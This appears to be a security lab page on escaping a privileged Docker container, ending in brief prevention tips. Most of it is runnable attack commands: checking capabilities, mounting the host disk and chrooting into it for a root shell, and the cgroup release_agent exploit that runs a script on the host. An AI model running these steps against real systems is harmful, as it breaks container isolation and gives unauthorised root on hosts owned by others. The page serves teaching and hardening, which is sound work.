⚠️ Pracivo Security Lab — Docker escape, Kubernetes misconfig, CI/CD secret exposure, supply chain attacks.
Privileged Container Escape
CONTAINER ESCAPE
# --privileged gives the container ALL Linux capabilities
# and disables seccomp/AppArmor — effectively root on the host
# Check if you're in a privileged container:
cat /proc/self/status | grep CapEff
# If CapEff = 0000003fffffffff — fully privileged
# Or:
ip link add dummy0 type dummy 2>/dev/null && echo "Privileged" || echo "Not privileged"
# Method 1: Mount host filesystem via disk device
fdisk -l # find host disk e.g. /dev/sda1
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host # root shell on host
# Method 2: cgroup release_agent exploit (classic privesc)
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo "#!/bin/sh" > /cmd
echo "id > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /output
# Shows root — you have code execution on host
# Prevention:
# Never use --privileged in production
# Use seccomp profiles
# Use AppArmor/SELinux
# Use rootless Docker